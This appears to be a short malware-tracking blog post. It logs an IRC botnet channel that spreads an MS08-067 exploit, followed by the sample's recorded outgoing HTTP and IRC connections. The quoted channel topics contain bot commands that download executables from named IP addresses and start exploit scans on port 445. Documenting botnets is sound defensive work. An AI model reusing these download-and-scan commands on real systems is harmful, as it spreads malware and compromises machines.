cos.chfo991.com(ms08-067 9k net from m0sad the russian lamer)

218.10.17.212:8585
Nick: [00_AUT_XP_3342645]
Username: SP3-154
Joined Channel: #tanker with Password open
Channel Topic for Channel #tanker: “.asc -S|.http http://218.10.17.212/hom.exe|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r|.advscan exp_sp2 15 3 0 -a -e -r|.r.getfile http://218.10.17.212/ark.exe C:ab.exe 1”
Private Message to Channel #tanker: “scan// Random Port Scan started on 192.168.x.x:445 with a delay of 3 seconds for 0 minutes using 35 threads.”
Private Message to Channel #tanker: “scan// Trying to get external IP.”
Private Message to Channel #spam: “HTTP SET http://218.10.17.212/hom.exe”
Invisible Users: 202
Operators: 1 operator(s) online
Channels: 4 channels formed
Clients: I have 8165 clients and 0 servers
Local users: Current Local Users: 8165 Max: 9900
Global users: Current Global Users: 8165 Max: 9900

Litle update

# Outgoing Connections

* HTTP Data
o Method: GET
o Url: 66.96.131.69/cgi-bin/prxjdg.cgi
o HTTP Version: HTTP/1.1
+ Header Data
# Host: www.cooleasy.com
# Cache-Control: no-cache
o Method: GET
o Url: 66.96.131.69/cgi-bin/prxjdg.cgi
o HTTP Version: HTTP/1.1
+ Header Data
# Host: www.cooleasy.com
# Cache-Control: no-cache
o Method: GET
o Url: 66.96.131.69/cgi-bin/prxjdg.cgi
o HTTP Version: HTTP/1.1
+ Header Data
# Host: www.cooleasy.com
# Cache-Control: no-cache
o Method: GET
o Url: 66.96.131.69/cgi-bin/prxjdg.cgi
o HTTP Version: HTTP/1.1
+ Header Data
# Host: www.cooleasy.com
# Cache-Control: no-cache
o Method: GET
o Url: 59.106.13.140/cgi-bin/envchk/prxjdg.cgi
o HTTP Version: HTTP/1.1
+ Header Data
# Host: www.mcreate.net
# Cache-Control: no-cache
o Method: GET
o Url: 59.106.13.140/cgi-bin/envchk/prxjdg.cgi
o HTTP Version: HTTP/1.1
+ Header Data
# Host: www.mcreate.net
# Cache-Control: no-cache
o Method: GET
o Url: 59.106.13.140/cgi-bin/envchk/prxjdg.cgi
o HTTP Version: HTTP/1.1
+ Header Data
# Host: www.mcreate.net
# Cache-Control: no-cache
o Method: GET
o Url: 203.190.60.131/cgi-bin/nph/prxjdg.cgi
o HTTP Version: HTTP/1.1
+ Header Data
# Host: kuwago.hp.infoseek.co.jp
# Cache-Control: no-cache
o Method: GET
o Url: 59.106.13.140/cgi-bin/envchk/prxjdg.cgi
o HTTP Version: HTTP/1.1
+ Header Data
# Host: www.mcreate.net
# Cache-Control: no-cache
o Method: GET
o Url: 203.190.60.131/cgi-bin/nph/prxjdg.cgi
o HTTP Version: HTTP/1.1
+ Header Data
# Host: kuwago.hp.infoseek.co.jp
# Cache-Control: no-cache
o Method: GET
o Url: 87.98.247.2/cgi-bin/prxjdg.cgi
o HTTP Version: HTTP/1.1
+ Header Data
# Host: www.cship.info
# Cache-Control: no-cache
o Method: GET
o Url: 87.98.247.2/cgi-bin/prxjdg.cgi
o HTTP Version: HTTP/1.1
+ Header Data
# Host: www.cship.info
# Cache-Control: no-cache
o Method: GET
o Url: 87.98.247.2/cgi-bin/prxjdg.cgi
o HTTP Version: HTTP/1.1
+ Header Data
# Host: www.cship.info
# Cache-Control: no-cache
o Method: GET
o Url: 87.98.247.2/cgi-bin/prxjdg.cgi
o HTTP Version: HTTP/1.1
+ Header Data
# Host: www.cship.info
# Cache-Control: no-cache
o Method: GET
o Url: 66.96.131.69/cgi-bin/prxjdg.cgi
o HTTP Version: HTTP/1.1
+ Header Data
# Host: www.cooleasy.com
# Cache-Control: no-cache
o Method: GET
o Url: 66.96.131.69/cgi-bin/prxjdg.cgi
o HTTP Version: HTTP/1.1
+ Header Data
# Host: www.cooleasy.com
# Cache-Control: no-cache
o Method: GET
o Url: 59.106.13.140/cgi-bin/envchk/prxjdg.cgi
o HTTP Version: HTTP/1.1
+ Header Data
# Host: www.mcreate.net
# Cache-Control: no-cache
o Method: GET
o Url: 59.106.13.140/cgi-bin/envchk/prxjdg.cgi
o HTTP Version: HTTP/1.1
+ Header Data
# Host: www.mcreate.net
# Cache-Control: no-cache
o IRC Data
+ User Name: SP3-694
+ Host Name: *
+ Server Name:
+ Real Name: HOME-OFF-D5F0AC
+ Nick Name: [N00_USA_XP_3352660]èá@
+ Non RFC Conform: 1
# Notice Message Deleted
* Value: :irc.priv8net.com NOTICE AUTH :*** Looking up your hostname…
* Value: :irc.priv8net.com NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead
+ User Name: SP3-431
+ Host Name: *
+ Server Name:
+ Real Name: HOME-OFF-D5F0AC
+ Nick Name: [00_USA_XP_0541565]
+ Non RFC Conform: 1
# Channel
* Name: #tanker
* Password: open
* Topic Deleted: :.asc -S|.http http://218.29.54.25/baba.exe|.advscan exp_sp3 35 3 0 -b -e -r|.advscan exp_sp2 35 3 0 -b -e -r|.advscan exp_sp3 15 3 0 -a -e -r|.advscan exp_sp2 15 3 0 -a -e -r
# Notice Message Deleted
* Value: :irc.priv8net.com NOTICE AUTH :*** Looking up your hostname…
* Value: :irc.priv8net.com NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead

# Transport Protocol: TCP
# Remote Address: 218.29.54.25
# Remote Port: 8585
# Protocol: IRC
# Connection Established: 1
# Socket: 1644

Categories: Uncategorized
Previous post
Next post